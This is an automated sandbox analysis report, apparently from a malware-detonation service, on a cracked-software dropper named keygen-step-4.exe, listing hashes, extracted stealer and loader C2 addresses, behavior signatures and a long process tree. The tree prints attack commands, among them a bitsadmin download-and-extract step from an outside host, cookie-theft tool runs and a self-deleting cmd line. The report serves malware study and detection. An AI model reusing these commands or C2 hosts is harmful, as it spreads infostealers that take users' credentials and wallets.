Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1804s
  • max time network
    1806s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    27-04-2021 13:26

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:2012
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {F1804D57-8CB5-4CB3-A759-6556283D4ABA} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:2872
              • C:\Users\Admin\AppData\Roaming\scssgca
                C:\Users\Admin\AppData\Roaming\scssgca
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:3528
                • C:\Users\Admin\AppData\Roaming\scssgca
                  C:\Users\Admin\AppData\Roaming\scssgca
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:4032
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {39E3C288-463A-420D-9180-779FFBE73698} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              3⤵
                PID:3212
                • C:\Users\Admin\AppData\Roaming\scssgca
                  C:\Users\Admin\AppData\Roaming\scssgca
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1536
                  • C:\Users\Admin\AppData\Roaming\scssgca
                    C:\Users\Admin\AppData\Roaming\scssgca
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:3396
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {07F5825F-E42C-4348-8BAA-684E52363803} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                3⤵
                  PID:1680
                  • C:\Users\Admin\AppData\Roaming\scssgca
                    C:\Users\Admin\AppData\Roaming\scssgca
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:4048
                    • C:\Users\Admin\AppData\Roaming\scssgca
                      C:\Users\Admin\AppData\Roaming\scssgca
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:2804
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:112
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
              1⤵
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1248
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1984
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1964
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:540
                • C:\Users\Admin\AppData\Local\Temp\is-E385E.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-E385E.tmp\Install.tmp" /SL5="$3017C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1648
                  • C:\Users\Admin\AppData\Local\Temp\is-O6GG0.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-O6GG0.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Modifies system certificate store
                    • Suspicious use of WriteProcessMemory
                    PID:1792
                    • C:\Program Files\Reference Assemblies\SFKDVMEDCN\ultramediaburner.exe
                      "C:\Program Files\Reference Assemblies\SFKDVMEDCN\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:348
                      • C:\Users\Admin\AppData\Local\Temp\is-HHONT.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-HHONT.tmp\ultramediaburner.tmp" /SL5="$2018A,281924,62464,C:\Program Files\Reference Assemblies\SFKDVMEDCN\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:1720
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:1248
                    • C:\Users\Admin\AppData\Local\Temp\b8-24a68-7b0-c9cb1-3fa9e7e77f6c3\Jemaekataeju.exe
                      "C:\Users\Admin\AppData\Local\Temp\b8-24a68-7b0-c9cb1-3fa9e7e77f6c3\Jemaekataeju.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:300
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:1936
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:620
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275461 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • NTFS ADS
                          • Suspicious use of SetWindowsHookEx
                          PID:2368
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:537619 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:3132
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                        6⤵
                          PID:3304
                      • C:\Users\Admin\AppData\Local\Temp\3d-a6ce0-a0a-200b1-7c8f7c2eed547\Haevaefebapa.exe
                        "C:\Users\Admin\AppData\Local\Temp\3d-a6ce0-a0a-200b1-7c8f7c2eed547\Haevaefebapa.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:856
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzkidj0i.qnl\skipper.exe /s & exit
                          6⤵
                            PID:2568
                            • C:\Users\Admin\AppData\Local\Temp\gzkidj0i.qnl\skipper.exe
                              C:\Users\Admin\AppData\Local\Temp\gzkidj0i.qnl\skipper.exe /s
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:3168
                              • C:\Users\Admin\AppData\Local\Temp\1105131914.exe
                                C:\Users\Admin\AppData\Local\Temp\1105131914.exe
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3604
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  9⤵
                                    PID:3012
                                • C:\Users\Admin\AppData\Local\Temp\1216581776.exe
                                  C:\Users\Admin\AppData\Local\Temp\1216581776.exe
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3076
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    9⤵
                                      PID:2420
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      9⤵
                                        PID:1448
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        9⤵
                                          PID:3332
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\gzkidj0i.qnl\skipper.exe & exit
                                        8⤵
                                          PID:3468
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 0
                                            9⤵
                                            • Runs ping.exe
                                            PID:3536
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cbzwba4.evs\001.exe & exit
                                      6⤵
                                        PID:3244
                                        • C:\Users\Admin\AppData\Local\Temp\2cbzwba4.evs\001.exe
                                          C:\Users\Admin\AppData\Local\Temp\2cbzwba4.evs\001.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:3356
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwy35km2.s1a\gpooe.exe & exit
                                        6⤵
                                          PID:3488
                                          • C:\Users\Admin\AppData\Local\Temp\pwy35km2.s1a\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\pwy35km2.s1a\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:3652
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:3804
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2268
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:696
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:276
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bsflhr3.gil\requête.exe & exit
                                          6⤵
                                            PID:3696
                                            • C:\Users\Admin\AppData\Local\Temp\3bsflhr3.gil\requête.exe
                                              C:\Users\Admin\AppData\Local\Temp\3bsflhr3.gil\requête.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:4016
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:3928
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b firefox
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:1728
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b edge
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2808
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                  parse.exe -f json -b chrome
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2872
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swno5ghx.m42\google-game.exe & exit
                                            6⤵
                                              PID:3884
                                              • C:\Users\Admin\AppData\Local\Temp\swno5ghx.m42\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\swno5ghx.m42\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2668
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  PID:3108
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cfviqlvu.y51\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:2500
                                                • C:\Users\Admin\AppData\Local\Temp\cfviqlvu.y51\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\cfviqlvu.y51\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:3136
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:3008
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:3336
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2828
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:4056
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:3212
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:1728
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Checks for any installed AV software in registry
                                                              PID:2752
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:3588
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pxdRVMSXYuTEkeCR -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:3940
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKUuwWBcJeNSIgpP -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:3416
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1800
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                8⤵
                                                                • Drops file in Program Files directory
                                                                PID:2720
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2428
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2420
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1268
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gGepSXikqlwO\gGepSXikqlwO.dll" gGepSXikqlwO
                                                                      8⤵
                                                                        PID:2920
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gGepSXikqlwO\gGepSXikqlwO.dll" gGepSXikqlwO
                                                                          9⤵
                                                                          • Drops file in System32 directory
                                                                          PID:3888
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2792
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:1776
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:3260
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                            8⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:1772
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiD174.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2452
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:1068
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ketrxxnb.frx\005.exe & exit
                                                                          6⤵
                                                                            PID:3980
                                                                            • C:\Users\Admin\AppData\Local\Temp\ketrxxnb.frx\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\ketrxxnb.frx\005.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:960
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ja05yayk.agk\GcleanerWW.exe /mixone & exit
                                                                            6⤵
                                                                              PID:3088
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwqvi32s.nti\toolspab1.exe & exit
                                                                              6⤵
                                                                                PID:3128
                                                                                • C:\Users\Admin\AppData\Local\Temp\mwqvi32s.nti\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\mwqvi32s.nti\toolspab1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:4080
                                                                                  • C:\Users\Admin\AppData\Local\Temp\mwqvi32s.nti\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\mwqvi32s.nti\toolspab1.exe
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2916
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\igdkva5h.yxn\app.exe /8-2222 & exit
                                                                                6⤵
                                                                                  PID:4036
                                                                                  • C:\Users\Admin\AppData\Local\Temp\igdkva5h.yxn\app.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\igdkva5h.yxn\app.exe /8-2222
                                                                                    7⤵
                                                                                    • Executes dropped EXE
